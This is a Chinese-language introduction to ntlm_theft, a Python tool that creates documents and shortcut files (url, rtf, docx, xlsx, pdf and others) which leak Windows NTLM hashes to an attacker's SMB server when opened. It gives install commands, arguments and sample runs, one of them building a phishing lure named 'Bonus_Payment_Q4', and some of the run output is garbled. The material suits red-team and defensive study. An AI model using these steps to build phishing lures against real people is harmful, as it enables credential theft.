关于ntlm_theftntlm_theft是一个基于Python3开发的开源工具,可以生成21种不同类型的hash-stealing文件。该工具适用于网络钓鱼攻击,可用于支持外部SMB流量和内部网络环境。与基于宏的文档或漏洞利用文档相比,这些文件类型的优势在于所有这些文件都是使用“预期功能”构建的。使用场景ntlm_theft主要是为渗透测试人员和红队研究人员设计的,可以帮助研究人员对目标公司员工进行内部钓鱼,或者大规模测试杀毒和邮件网关的安全性。如果外部防火墙允许出站SMB访问,它也可以用于外部网络钓鱼。该工具依赖ntlm_theft,它是基于Python3开发的,所以我们需要在本地环境安装配置Python3环境,安装xlsxwriter:pip3installxlsxwriter工具下载广大研究者可以使用如下命令克隆源码项目代码到本地:gitclonehttps://github.com/Greenwolf/ntlm_theft.git工具参数的运行ntlm_theft需要提供四个必要的参数,输入格式,输入文件或目录,基本运行模式:-g,--generate:选择生成所有文件或指定文件类型-s,--server:SMB哈希捕获服务器的IP地址-f,--filename:无后缀的基本文件名,以后可以改名ntlm_theft生成所有文件:#python3ntlm_theft.py-gall-s127.0.0.1-ftestCreated:test/test.scf(BROWSE)Created:test/test-(url).url(BROWSE)Created:test/test-(icon).url(BROWSE)Created:test/test.rtf(OPEN)Created:test/test-(stylesheet).xml(OPEN)Created:test/test-(fulldocx.xml(打开)已创建:测试/测试。htm(OPENFROMDESKTOPWITHCHROME,IEOREDGE)创建:测试/测试-(includepicture).docx(OPEN)创建:测试/测试-(remotetempl*ate).docx(OPEN)创建:测试/测试-(frameset).docx(OPEN)创建:test/test.m3u(OPENINWINDOWSMEDIAPL*AYERONLY)创建:test/test.asx(OPEN)创建:test/test.jnlp(OPEN)创建:test/test.application(DOWNLOADANDOPEN)Created:test/test.pdf(OPENANDALLOW)Created:test/zoom-attack-instructions.txt(PASTETOCHAT)GenerationComplete.在下面的工具使用示例中,我们将使用ntlm_theft生成现代文件:#python3ntlm_theft.py-gmodern-s127.0.0.1-fmeetingSkippingSCFasitdoesnotworkonmodernWindowsCreated:meeting/meeting-(url).url(BROWSETOFOLDER)Created:meeting/meeting-(icon).url(BROWSETOFOLDER)Created:meeting/meeting.rtf(OPEN)创建:meeting/meeting-(stylesheet.xml(OPEN)Created:meeting/meeting-(fulldocx).xml(OPEN)Created:meeting/meeting.htm(OPENFROMDESKTOPWITHCHROME,IEOREDGE)Created:meeting/meeting-(includepicture).docx(OPEN)Created:meeting/meeting-(remotetempl*ate).docx(OPEN)Created:meeting/meeting-(frameset).docx(OPEN)Created:meeting/meeting-(externalcell).xlsx(OPEN)Created:meeting/meeting.m3u(OPENINWINDOWSMEDIAPL*AYERONLY)Created:meeting/meeting.asx(OPEN)Created:meeting/meeting.jnlp(OPEN)Created:meeting/meeting.application(DOWNLOADANDOPEN)Created:meeting/meeting.pdf(OPENANDALLOW)SkippingzoomasitdoesnotworkonthelatestversionsSkippingAutorun.infasitdoesnotworkonmodernWindowsSkippingdesktop.iniasitdoesnotworkonmodernWindowsGenerationComplete.在下面的工具使用样例中,我们将使用ntlm_theft仅生成一份xlsx文件:#python3ntlm_theft.py-gxlsx-s192.168.1.103-fBonus_Payment_Q4Created:Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx(OPEN)GenerationComplete.ToolrunningscreenshotProjectaddressntlm_theft:[GitHubPortal]
